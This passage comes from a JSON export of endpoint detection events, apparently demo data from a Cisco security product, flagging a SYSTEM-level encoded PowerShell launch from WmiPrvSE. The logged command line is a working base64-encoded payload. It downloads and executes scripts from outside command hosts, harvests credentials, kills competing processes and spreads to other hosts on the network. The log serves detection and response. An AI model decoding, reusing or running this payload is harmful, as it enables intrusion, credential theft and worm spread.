"cmd_line": "powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==",
"parent_app": "WmiPrvSE.exe",
"parent_app_path": "C:\\Windows\\System32\\wbem",
"parent_pid": 2236,
"parent_puid": 132461352663910600,
"parent_user": "SYSTEM",
"parent_user_sid": "010100000000000512000000",
"pid": 10724,
"puid": 132465072105597400,
"ts": 1602033881727175700,
"user": "SYSTEM",
"user_sid": "010100000000000512000000"
}
}
],
"limited": false,
"matched": 1
},
"schema": "endpoint",
"schema_epoch": 2,
"sig_id": 20190517123456,
"sig_rev": 5
},
"detection": "apde:20190517123456",
"end_ts": 1647533684,
"engine": "apde",
"id": "d2616Ab846",
"name": "WMIPRVSE Launched Encoded Powershell Command",
"observables": {
"file": [
{
"md5": "a575a7610e5f003cc36df39e07c4ba7d",
"name": "powershell.exe",
"path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"properties": {
"copyright": "© Microsoft Corporation. All rights reserved.",
"file_version": "10.0.14409.1005",
"product": "Microsoft® Windows® Operating System",
"product_version": "10.0.14409.1005"
},
"sha1": "88e7cdc0b75364418e11b2c53f772085f1b61d1e",
"sha256": "006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218",
"size": 443392,
"type_id": 1
},
{
"md5": "d683c112190f4b4c6d477d693ee88e35",
"name": "WmiPrvSE.exe",
"path": "C:\\Windows\\System32\\wbem",
"properties": {
"copyright": "© Microsoft Corporation. All rights reserved.",
"file_version": "10.0.14409.1005",
"product": "Microsoft® Windows® Operating System",
"product_version": "10.0.14409.1005"
},
"sha1": "67858ead93feed62c0b1865369840e6e8086f53b",
"sha256": "385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334",
"size": 425984,
"type_id": 1
}
]
},
"remediated": false,
"severity": "medium",
"silent": false,
"start_ts": 1647533684,
"tactics": [
"TA0002",
"TA0005"
],
"type": "activity",
"normalized": {
"observables": {
"file": {
"name": [
"powershell.exe",
"wmiprvse.exe"
],
"path": [
"c:\\windows\\system32\\windowspowershell\\v1.0",
"c:\\windows\\system32\\wbem"
]
}
},
"name": "wmiprvse launched encoded powershell command"
},
"demo": true
}
},
{
"id": 6880683125978957000,
"timestamp": 1647533684,
"timestamp_nanoseconds": 810000000,
"date": "2022-03-17T16:14:44+00:00",
"event_type": "Threat Detection",
"event_type_id": 553648222,
"detection": "WMIPRVSE Launched Encoded Powershell Command",
"connector_guid": "f3185c52-4903-41da-a833-04a534460eb3",
"group_guids": [
"3aef61ae-a41f-4a89-a47d-1ce96164eea8"
],
"severity": "Medium",
"computer": {
"connector_guid": "f3185c52-4903-41da-a833-04a534460eb3",
"hostname": "Demo_BP_WMIPRVSE",
"external_ip": "234.38.52.99",
"active": true,
"network_addresses": [
{
"ip": "157.184.70.94",
"mac": "67:71:7f:26:b1:5f"
}
],
"links": {
"computer": "https://api.consumer.amp.cisco.com/v0/computers/f3185c52-4903-41da-a833-04a534460eb3",
"trajectory": "https://api.consumer.amp.cisco.com/v0/computers/f3185c52-4903-41da-a833-04a534460eb3/trajectory",
"group": "https://api.consumer.amp.cisco.com/v0/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
}
},
"tactics": [
"TA0002",
"TA0005"
],
"bp_data": {
"audit": false,
"details": {
"actions": [
{
"action": "end_process",
"end_ts": 1602033881808,
"params": [
"10724"
],
"start_ts": 1602033881805,
"status": "success"
}
],
"eng_epoch": 1,
"eng_ver": "0.9.0.104",
"matched_activity": {
"events": [
{
"process:start": {
"app": "powershell.exe",
"app_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"args": [
"powershell.exe",
"-NoP"
],
"cmd_line": "powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0A